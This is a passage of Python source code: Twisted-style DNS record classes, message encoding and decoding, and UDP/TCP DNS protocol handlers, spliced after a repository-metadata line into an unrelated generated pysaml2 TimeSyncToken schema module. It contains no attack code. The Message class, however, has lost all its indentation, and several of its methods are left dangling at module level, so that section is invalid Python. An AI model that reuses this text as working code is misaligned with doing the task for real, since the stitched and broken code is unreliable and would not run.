        self.regexp = Charstr(regexp)
        self.replacement = Name(replacement)
        self.ttl = str2time(ttl)
    def encode(self, strio, compDict=None):
        """
        Write the wire form of this record: the two fixed 16-bit fields
        followed by three character-strings and the replacement name.
        """
        strio.write(struct.pack('!HH', self.order, self.preference))
        # None of the variable-length fields may use name compression.
        self.flags.encode(strio, None)
        self.service.encode(strio, None)
        self.regexp.encode(strio, None)
        self.replacement.encode(strio, None)
    def decode(self, strio, length=None):
        """
        Populate this record from its wire form, replacing all field
        objects with freshly decoded ones.
        """
        r = struct.unpack('!HH', readPrecisely(strio, struct.calcsize('!HH')))
        self.order, self.preference = r
        self.flags = Charstr()
        self.service = Charstr()
        self.regexp = Charstr()
        self.replacement = Name()
        self.flags.decode(strio)
        self.service.decode(strio)
        self.regexp.decode(strio)
        self.replacement.decode(strio)
    def __hash__(self):
        return hash((
            self.order, self.preference, self.flags,
            self.service, self.regexp, self.replacement))
class Record_AFSDB(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    Map from a domain name to the name of an AFS cell database server.

    @type subtype: C{int}
    @ivar subtype: In the case of subtype 1, the host has an AFS version 3.0
        Volume Location Server for the named AFS cell.  In the case of
        subtype 2, the host has an authenticated name server holding the
        cell-root directory node for the named DCE/NCA cell.

    @type hostname: L{Name}
    @ivar hostname: The domain name of a host that has a server for the cell
        named by this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc1183.html}
    """
    implements(IEncodable, IRecord)

    TYPE = AFSDB
    fancybasename = 'AFSDB'
    compareAttributes = ('subtype', 'hostname', 'ttl')
    showAttributes = ('subtype', ('hostname', 'hostname', '%s'), 'ttl')

    def __init__(self, subtype=0, hostname='', ttl=None):
        self.subtype = int(subtype)
        self.hostname = Name(hostname)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        strio.write(struct.pack('!H', self.subtype))
        self.hostname.encode(strio, compDict)

    def decode(self, strio, length=None):
        raw = readPrecisely(strio, struct.calcsize('!H'))
        self.subtype, = struct.unpack('!H', raw)
        # Decodes into the Name instance created by __init__.
        self.hostname.decode(strio)

    def __hash__(self):
        return hash((self.subtype, self.hostname))
class Record_RP(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    The responsible person for a domain.

    @type mbox: L{Name}
    @ivar mbox: A domain name that specifies the mailbox for the responsible
        person.

    @type txt: L{Name}
    @ivar txt: A domain name for which TXT RR's exist (indirection through
        which allows information sharing about the contents of this RP
        record).

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc1183.html}
    """
    implements(IEncodable, IRecord)

    TYPE = RP
    fancybasename = 'RP'
    compareAttributes = ('mbox', 'txt', 'ttl')
    showAttributes = (('mbox', 'mbox', '%s'), ('txt', 'txt', '%s'), 'ttl')

    def __init__(self, mbox='', txt='', ttl=None):
        self.mbox = Name(mbox)
        self.txt = Name(txt)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        self.mbox.encode(strio, compDict)
        self.txt.encode(strio, compDict)

    def decode(self, strio, length=None):
        self.mbox = Name()
        self.txt = Name()
        for field in (self.mbox, self.txt):
            field.decode(strio)

    def __hash__(self):
        return hash((self.mbox, self.txt))
class Record_HINFO(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    Host information.

    @type cpu: C{str}
    @ivar cpu: Specifies the CPU type.

    @type os: C{str}
    @ivar os: Specifies the OS.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    TYPE = HINFO
    fancybasename = 'HINFO'
    showAttributes = compareAttributes = ('cpu', 'os', 'ttl')

    def __init__(self, cpu='', os='', ttl=None):
        self.cpu = cpu
        self.os = os
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        # Both fields are written as length-prefixed character strings.
        for field in (self.cpu, self.os):
            strio.write(struct.pack('!B', len(field)) + field)

    def decode(self, strio, length=None):
        cpuLen = struct.unpack('!B', readPrecisely(strio, 1))[0]
        self.cpu = readPrecisely(strio, cpuLen)
        osLen = struct.unpack('!B', readPrecisely(strio, 1))[0]
        self.os = readPrecisely(strio, osLen)

    def __eq__(self, other):
        if not isinstance(other, Record_HINFO):
            return NotImplemented
        # Comparisons are case-insensitive for both text fields.
        return (self.os.lower() == other.os.lower() and
                self.cpu.lower() == other.cpu.lower() and
                self.ttl == other.ttl)

    def __hash__(self):
        return hash((self.os.lower(), self.cpu.lower()))
class Record_MINFO(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    Mailbox or mail list information.

    This is an experimental record type.

    @type rmailbx: L{Name}
    @ivar rmailbx: A domain-name which specifies a mailbox which is
        responsible for the mailing list or mailbox.  If this domain name
        names the root, the owner of the MINFO RR is responsible for itself.

    @type emailbx: L{Name}
    @ivar emailbx: A domain-name which specifies a mailbox which is to
        receive error messages related to the mailing list or mailbox
        specified by the owner of the MINFO record.  If this domain name
        names the root, errors should be returned to the sender of the
        message.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    TYPE = MINFO
    rmailbx = None
    emailbx = None
    fancybasename = 'MINFO'
    compareAttributes = ('rmailbx', 'emailbx', 'ttl')
    showAttributes = (('rmailbx', 'responsibility', '%s'),
                      ('emailbx', 'errors', '%s'),
                      'ttl')

    def __init__(self, rmailbx='', emailbx='', ttl=None):
        self.rmailbx = Name(rmailbx)
        self.emailbx = Name(emailbx)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        self.rmailbx.encode(strio, compDict)
        self.emailbx.encode(strio, compDict)

    def decode(self, strio, length=None):
        self.rmailbx = Name()
        self.emailbx = Name()
        for box in (self.rmailbx, self.emailbx):
            box.decode(strio)

    def __hash__(self):
        return hash((self.rmailbx, self.emailbx))
class Record_MX(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    Mail exchange.

    @type preference: C{int}
    @ivar preference: Specifies the preference given to this RR among others
        at the same owner.  Lower values are preferred.

    @type name: L{Name}
    @ivar name: A domain-name which specifies a host willing to act as a mail
        exchange.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)
    TYPE = MX
    fancybasename = 'MX'
    compareAttributes = ('preference', 'name', 'ttl')
    showAttributes = ('preference', ('name', 'name', '%s'), 'ttl')
    def __init__(self, preference=0, name='', ttl=None, **kwargs):
        # The deprecated 'exchange' keyword is accepted as an alias for
        # 'name' (see the deprecated `exchange` property below).  Any
        # other keyword arguments are silently ignored.
        self.preference, self.name = int(preference), Name(kwargs.get('exchange', name))
        self.ttl = str2time(ttl)
    def encode(self, strio, compDict = None):
        strio.write(struct.pack('!H', self.preference))
        self.name.encode(strio, compDict)
    def decode(self, strio, length = None):
        self.preference = struct.unpack('!H', readPrecisely(strio, 2))[0]
        self.name = Name()
        self.name.decode(strio)
    def exchange(self):
        # Deprecated read-only alias for `name`; warns on access.
        warnings.warn("use Record_MX.name instead", DeprecationWarning, stacklevel=2)
        return self.name
    exchange = property(exchange)
    def __hash__(self):
        return hash((self.preference, self.name))
# Record_TXT needs special handling: it is the one record type whose total
# length is not encoded in its data, so decoding must rely on the rdlength
# value passed in (see IEncodable.decode).
class Record_TXT(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    Freeform text.

    @type data: C{list} of C{str}
    @ivar data: Freeform text which makes up this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    TYPE = TXT
    fancybasename = 'TXT'
    showAttributes = compareAttributes = ('data', 'ttl')

    def __init__(self, *data, **kw):
        self.data = list(data)
        # ttl must come in as a keyword because *data consumes every
        # positional argument.
        self.ttl = str2time(kw.get('ttl', None))

    def encode(self, strio, compDict=None):
        # Each string is written as a length-prefixed chunk.
        for chunk in self.data:
            strio.write(struct.pack('!B', len(chunk)) + chunk)

    def decode(self, strio, length=None):
        consumed = 0
        self.data = []
        while consumed < length:
            chunkLength = struct.unpack('!B', readPrecisely(strio, 1))[0]
            self.data.append(readPrecisely(strio, chunkLength))
            consumed += chunkLength + 1
        if consumed != length:
            # Overran rdlength: the last chunk's length byte claimed more
            # data than the record contains.
            log.msg(
                "Decoded %d bytes in %s record, but rdlength is %d" % (
                    consumed, self.fancybasename, length
                )
            )

    def __hash__(self):
        return hash(tuple(self.data))
class Record_SPF(Record_TXT):
    """
    Structurally, freeform text.  Semantically, a policy definition, formatted
    as defined in U{rfc 4408<http://www.faqs.org/rfcs/rfc4408.html>}.

    @type data: C{list} of C{str}
    @ivar data: Freeform text which makes up this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be cached.
    """
    # Identical wire format to TXT; only the type code differs.
    TYPE = SPF
    fancybasename = 'SPF'
class Message:
"""
L{Message} contains all the information represented by a single
DNS request or response.
"""
headerFmt = "!H2B4H"
headerSize = struct.calcsize(headerFmt)
# Question, answer, additional, and nameserver lists
queries = answers = add = ns = None
def __init__(self, id=0, answer=0, opCode=0, recDes=0, recAv=0,
auth=0, rCode=OK, trunc=0, maxSize=512):
self.maxSize = maxSize
self.id = id
self.answer = answer
self.opCode = opCode
self.auth = auth
self.trunc = trunc
self.recDes = recDes
self.recAv = recAv
self.rCode = rCode
self.queries = []
self.answers = []
self.authority = []
self.additional = []
def addQuery(self, name, type=ALL_RECORDS, cls=IN):
"""
Add another query to this Message.
@type name: C{str}
@param name: The name to query.
@type type: C{int}
@param type: Query type
@type cls: C{int}
@param cls: Query class
"""
self.queries.append(Query(name, type, cls))
def encode(self, strio):
compDict = {}
body_tmp = StringIO.StringIO()
for q in self.queries:
q.encode(body_tmp, compDict)
for q in self.answers:
q.encode(body_tmp, compDict)
for q in self.authority:
q.encode(body_tmp, compDict)
for q in self.additional:
q.encode(body_tmp, compDict)
body = body_tmp.getvalue()
size = len(body) + self.headerSize
if self.maxSize and size > self.maxSize:
self.trunc = 1
body = body[:self.maxSize - self.headerSize]
byte3 = (( ( self.answer & 1 ) << 7 )
| ((self.opCode & 0xf ) << 3 )
| ((self.auth & 1 ) << 2 )
| ((self.trunc & 1 ) << 1 )
| ( self.recDes & 1 ) )
byte4 = ( ( (self.recAv & 1 ) << 7 )
| (self.rCode & 0xf ) )
strio.write(struct.pack(self.headerFmt, self.id, byte3, byte4,
len(self.queries), len(self.answers),
len(self.authority), len(self.additional)))
strio.write(body)
def decode(self, strio, length=None):
self.maxSize = 0
header = readPrecisely(strio, self.headerSize)
r = struct.unpack(self.headerFmt, header)
self.id, byte3, byte4, nqueries, nans, nns, nadd = r
self.answer = ( byte3 >> 7 ) & 1
self.opCode = ( byte3 >> 3 ) & 0xf
self.auth = ( byte3 >> 2 ) & 1
self.trunc = ( byte3 >> 1 ) & 1
self.recDes = byte3 & 1
self.recAv = ( byte4 >> 7 ) & 1
self.rCode = byte4 & 0xf
self.queries = []
for i in range(nqueries):
q = Query()
try:
q.decode(strio)
except EOFError:
return
self.queries.append(q)
items = ((self.answers, nans), (self.authority, nns), (self.additional, nadd))
for (l, n) in items:
self.parseRecords(l, n, strio)
def parseRecords(self, list, num, strio):
for i in range(num):
header = RRHeader()
try:
header.decode(strio)
except EOFError:
return
t = self.lookupRecordType(header.type)
if not t:
continue
header.payload = t(ttl=header.ttl)
try:
header.payload.decode(strio, header.rdlength)
except EOFError:
return
list.append(header)
# Create a mapping from record types to their corresponding Record_*
# classes. This relies on the global state which has been created so
# far in initializing this module (so don't define Record classes after
# this).
_recordTypes = {}
for name in globals():
if name.startswith('Record_'):
_recordTypes[globals()[name].TYPE] = globals()[name]
# Clear the iteration variable out of the class namespace so it
# doesn't become an attribute.
del name
def lookupRecordType(self, type):
    """
    Retrieve the L{IRecord} implementation for the given record type.

    @param type: A record type, such as L{A} or L{NS}.
    @type type: C{int}

    @return: An object which implements L{IRecord} or C{None} if none
        can be found for the given type.
    @rtype: L{types.ClassType}
    """
    try:
        return self._recordTypes[type]
    except KeyError:
        return None
def toStr(self):
    """
    Return the wire-format encoding of this message as a string.
    """
    buf = StringIO.StringIO()
    self.encode(buf)
    return buf.getvalue()
def fromStr(self, str):
    """
    Decode this message in place from the wire-format string ``str``.
    """
    self.decode(StringIO.StringIO(str))
class DNSMixin(object):
    """
    DNS protocol mixin shared by UDP and TCP implementations.

    @ivar _reactor: A L{IReactorTime} and L{IReactorUDP} provider which will
        be used to issue DNS queries and manage request timeouts.
    """
    id = None
    liveMessages = None

    def __init__(self, controller, reactor=None):
        self.controller = controller
        self.id = random.randrange(2 ** 10, 2 ** 15)
        if reactor is None:
            from twisted.internet import reactor
        self._reactor = reactor

    def pickID(self):
        """
        Return a unique ID for queries.
        """
        # Keep drawing random IDs until one not attached to an
        # outstanding query turns up.
        while True:
            candidate = randomSource()
            if candidate not in self.liveMessages:
                return candidate

    def callLater(self, period, func, *args):
        """
        Wrapper around reactor.callLater, mainly for test purpose.
        """
        return self._reactor.callLater(period, func, *args)

    def _query(self, queries, timeout, id, writeMessage):
        """
        Send out a message with the given queries.

        @type queries: C{list} of C{Query} instances
        @param queries: The queries to transmit
        @type timeout: C{int} or C{float}
        @param timeout: How long to wait before giving up
        @type id: C{int}
        @param id: Unique key for this request
        @type writeMessage: C{callable}
        @param writeMessage: One-parameter callback which writes the message

        @rtype: C{Deferred}
        @return: a C{Deferred} which will be fired with the result of the
            query, or errbacked with any errors that could happen (exceptions
            during writing of the query, timeout errors, ...).
        """
        message = Message(id, recDes=1)
        message.queries = queries

        try:
            writeMessage(message)
        except:
            return defer.fail()

        d = defer.Deferred()
        timeoutCall = self.callLater(timeout, self._clearFailed, d, id)
        self.liveMessages[id] = (d, timeoutCall)
        return d

    def _clearFailed(self, deferred, id):
        """
        Clean the Deferred after a timeout.
        """
        try:
            del self.liveMessages[id]
        except KeyError:
            pass
        deferred.errback(failure.Failure(DNSQueryTimeoutError(id)))
class DNSDatagramProtocol(DNSMixin, protocol.DatagramProtocol):
    """
    DNS protocol over UDP.
    """
    resends = None

    def stopProtocol(self):
        """
        Stop protocol: reset state variables.
        """
        self.liveMessages = {}
        self.resends = {}
        self.transport = None

    def startProtocol(self):
        """
        Upon start, reset internal state.
        """
        self.liveMessages = {}
        self.resends = {}

    def writeMessage(self, message, address):
        """
        Send a message holding DNS queries.

        @type message: L{Message}
        """
        self.transport.write(message.toStr(), address)

    def startListening(self):
        # Port 0 lets the OS choose a free port; 512 bytes is the
        # maximum size requested for a UDP DNS datagram here.
        self._reactor.listenUDP(0, self, maxPacketSize=512)

    def datagramReceived(self, data, addr):
        """
        Read a datagram, extract the message in it and trigger the associated
        Deferred.
        """
        message = Message()
        try:
            message.fromStr(data)
        except EOFError:
            log.msg("Truncated packet (%d bytes) from %s" % (len(data), addr))
            return
        except:
            # Nothing should trigger this, but since we're potentially
            # invoking a lot of different decoding methods, we might as well
            # be extra cautious. Anything that triggers this is itself
            # buggy.
            log.err(failure.Failure(), "Unexpected decoding error")
            return

        if message.id not in self.liveMessages:
            # Not a reply to one of our queries; hand it to the controller
            # unless it duplicates a message we are ourselves resending.
            if message.id not in self.resends:
                self.controller.messageReceived(message, self, addr)
            return

        d, canceller = self.liveMessages.pop(message.id)
        canceller.cancel()
        # XXX we shouldn't need this hack of catching exception on callback()
        try:
            d.callback(message)
        except:
            log.err()

    def removeResend(self, id):
        """
        Mark message ID as no longer having duplication suppression.
        """
        self.resends.pop(id, None)

    def query(self, address, queries, timeout=10, id=None):
        """
        Send out a message with the given queries.

        @type address: C{tuple} of C{str} and C{int}
        @param address: The address to which to send the query
        @type queries: C{list} of C{Query} instances
        @param queries: The queries to transmit
        @rtype: C{Deferred}
        """
        if not self.transport:
            # XXX transport might not get created automatically, use callLater?
            try:
                self.startListening()
            except CannotListenError:
                return defer.fail()

        if id is None:
            id = self.pickID()
        else:
            self.resends[id] = 1

        def writeMessage(m):
            self.writeMessage(m, address)

        return self._query(queries, timeout, id, writeMessage)
class DNSProtocol(DNSMixin, protocol.Protocol):
    """
    DNS protocol over TCP.

    Messages on the stream are framed with a two-byte big-endian length
    prefix, as specified for DNS over TCP.
    """
    # Length of the message currently being received, or None while the
    # two-byte prefix itself has not yet been fully read.
    length = None
    buffer = ''

    def writeMessage(self, message):
        """
        Send a message holding DNS queries.

        @type message: L{Message}
        """
        s = message.toStr()
        self.transport.write(struct.pack('!H', len(s)) + s)

    def connectionMade(self):
        """
        Connection is made: reset internal state, and notify the controller.
        """
        self.liveMessages = {}
        self.controller.connectionMade(self)

    def connectionLost(self, reason):
        """
        Notify the controller that this protocol is no longer
        connected.
        """
        self.controller.connectionLost(self)

    def dataReceived(self, data):
        """
        Accumulate stream data and dispatch each complete, length-prefixed
        message: replies to live queries fire their Deferred, anything else
        goes to the controller.
        """
        self.buffer += data

        while self.buffer:
            if self.length is None and len(self.buffer) >= 2:
                self.length = struct.unpack('!H', self.buffer[:2])[0]
                self.buffer = self.buffer[2:]

            # BUGFIX: only attempt to parse once the length prefix has been
            # read AND that many bytes are buffered.  Without the explicit
            # None check, receiving fewer than two bytes left self.length as
            # None and compared len(self.buffer) >= None, which (under the
            # Python 2 ordering rules this code relies on) was always true
            # and caused an incomplete message to be parsed.
            if self.length is not None and len(self.buffer) >= self.length:
                myChunk = self.buffer[:self.length]
                m = Message()
                m.fromStr(myChunk)

                try:
                    d, canceller = self.liveMessages[m.id]
                except KeyError:
                    # Not a reply to one of our queries.
                    self.controller.messageReceived(m, self)
                else:
                    del self.liveMessages[m.id]
                    canceller.cancel()
                    # XXX we shouldn't need this hack
                    try:
                        d.callback(m)
                    except:
                        log.err()

                # Drop the consumed message and start over on the prefix.
                self.buffer = self.buffer[self.length:]
                self.length = None
            else:
                break

    def query(self, queries, timeout=60):
        """
        Send out a message with the given queries.

        @type queries: C{list} of C{Query} instances
        @param queries: The queries to transmit
        @rtype: C{Deferred}
        """
        id = self.pickID()
        return self._query(queries, timeout, id, self.writeMessage)
| apache-2.0 |
fangxingli/hue | desktop/core/ext-py/pysaml2-2.4.0/src/saml2/authn_context/timesync.py | 37 | 107827 | #!/usr/bin/env python
#
# Generated Thu May 16 21:05:38 2013 by parse_xsd.py version 0.5.
#
import saml2
from saml2 import SamlBase
NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken'
class PhysicalVerification(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    PhysicalVerification element """
    c_tag = 'PhysicalVerification'
    c_namespace = NAMESPACE
    # Per-class copies of the base schema tables, so the additions below
    # do not mutate SamlBase.
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Attribute entry format: (python attribute name, value type, required).
    c_attributes['credentialLevel'] = ('credential_level', 'None', False)

    def __init__(self,
                 credential_level=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.credential_level = credential_level
def physical_verification_from_string(xml_string):
    """Deserialize a PhysicalVerification element from its XML string form."""
    return saml2.create_class_from_xml_string(PhysicalVerification, xml_string)
class Generation(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Generation
    element """
    c_tag = 'Generation'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # 'mechanism' is a required attribute: (python name, value type, required).
    c_attributes['mechanism'] = ('mechanism', 'None', True)

    def __init__(self,
                 mechanism=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.mechanism = mechanism
def generation_from_string(xml_string):
    """Deserialize a Generation element from its XML string form."""
    return saml2.create_class_from_xml_string(Generation, xml_string)
class NymType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:nymType
    element """
    c_tag = 'nymType'
    c_namespace = NAMESPACE
    # Simple type: text content restricted to the enumerated NMTOKEN values.
    c_value_type = {'base': 'xs:NMTOKEN',
                    'enumeration': ['anonymity', 'verinymity', 'pseudonymity']}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def nym_type__from_string(xml_string):
    """Deserialize a NymType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(NymType_, xml_string)
class GoverningAgreementRefType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    GoverningAgreementRefType element """
    c_tag = 'GoverningAgreementRefType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Required anyURI attribute: (python name, value type, required).
    c_attributes['governingAgreementRef'] = (
        'governing_agreement_ref', 'anyURI', True)

    def __init__(self,
                 governing_agreement_ref=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.governing_agreement_ref = governing_agreement_ref
def governing_agreement_ref_type__from_string(xml_string):
    """Deserialize a GoverningAgreementRefType_ from its XML string form."""
    return saml2.create_class_from_xml_string(GoverningAgreementRefType_,
                                              xml_string)
class KeySharingType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeySharingType
    element """
    c_tag = 'KeySharingType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Required boolean attribute: (python name, value type, required).
    c_attributes['sharing'] = ('sharing', 'boolean', True)

    def __init__(self,
                 sharing=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.sharing = sharing
def key_sharing_type__from_string(xml_string):
    """Deserialize a KeySharingType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(KeySharingType_, xml_string)
class RestrictedLengthType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    RestrictedLengthType element """
    c_tag = 'RestrictedLengthType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # 'min' is required, 'max' optional: (python name, value type, required).
    c_attributes['min'] = ('min', 'None', True)
    c_attributes['max'] = ('max', 'integer', False)

    def __init__(self,
                 min=None,
                 max=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.min = min
        self.max = max
def restricted_length_type__from_string(xml_string):
    """Deserialize a RestrictedLengthType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(RestrictedLengthType_, xml_string)
class AlphabetType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AlphabetType
    element """
    c_tag = 'AlphabetType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Attribute entries: (python name, value type, required).
    c_attributes['requiredChars'] = ('required_chars', 'string', True)
    c_attributes['excludedChars'] = ('excluded_chars', 'string', False)
    c_attributes['case'] = ('case', 'string', False)

    def __init__(self,
                 required_chars=None,
                 excluded_chars=None,
                 case=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None,
                 ):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes,
                          )
        self.required_chars = required_chars
        self.excluded_chars = excluded_chars
        self.case = case
def alphabet_type__from_string(xml_string):
    """Deserialize an AlphabetType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(AlphabetType_, xml_string)
class DeviceTypeType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DeviceTypeType
    element """
    c_tag = 'DeviceTypeType'
    c_namespace = NAMESPACE
    # Simple type: text content restricted to the enumerated NMTOKEN values.
    c_value_type = {'base': 'xs:NMTOKEN',
                    'enumeration': ['hardware', 'software']}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def device_type_type__from_string(xml_string):
    """Deserialize a DeviceTypeType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(DeviceTypeType_, xml_string)
class BooleanType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:booleanType
    element """
    c_tag = 'booleanType'
    c_namespace = NAMESPACE
    # Simple type: text content restricted to 'true' or 'false'.
    c_value_type = {'base': 'xs:NMTOKEN', 'enumeration': ['true', 'false']}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def boolean_type__from_string(xml_string):
    """Deserialize a BooleanType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(BooleanType_, xml_string)
class ActivationLimitDurationType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    ActivationLimitDurationType element """
    c_tag = 'ActivationLimitDurationType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Required xs:duration attribute: (python name, value type, required).
    c_attributes['duration'] = ('duration', 'duration', True)

    def __init__(self,
                 duration=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.duration = duration
def activation_limit_duration_type__from_string(xml_string):
    """Deserialize an ActivationLimitDurationType_ from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitDurationType_,
                                              xml_string)
class ActivationLimitUsagesType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    ActivationLimitUsagesType element """
    c_tag = 'ActivationLimitUsagesType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # Required integer attribute: (python name, value type, required).
    c_attributes['number'] = ('number', 'integer', True)

    def __init__(self,
                 number=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.number = number
def activation_limit_usages_type__from_string(xml_string):
    """Deserialize an ActivationLimitUsagesType_ from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitUsagesType_,
                                              xml_string)
class ActivationLimitSessionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:
    ActivationLimitSessionType element """
    # No attributes or children of its own beyond those of SamlBase.
    c_tag = 'ActivationLimitSessionType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
def activation_limit_session_type__from_string(xml_string):
    """Deserialize an ActivationLimitSessionType_ from its XML string form."""
    return saml2.create_class_from_xml_string(ActivationLimitSessionType_,
                                              xml_string)
class LengthType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:LengthType
    element """
    c_tag = 'LengthType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # 'min' is required, 'max' optional: (python name, value type, required).
    c_attributes['min'] = ('min', 'integer', True)
    c_attributes['max'] = ('max', 'integer', False)

    def __init__(self,
                 min=None,
                 max=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self,
                          text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.min = min
        self.max = max
def length_type__from_string(xml_string):
    """Deserialize a LengthType_ instance from its XML string form."""
    return saml2.create_class_from_xml_string(LengthType_, xml_string)
class MediumType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:mediumType
    element """
    c_tag = 'mediumType'
    c_namespace = NAMESPACE
    # Simple type: text content restricted to the enumerated NMTOKEN values.
    c_value_type = {'base': 'xs:NMTOKEN',
                    'enumeration': ['memory', 'smartcard', 'token',
                                    'MobileDevice', 'MobileAuthCard']}
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
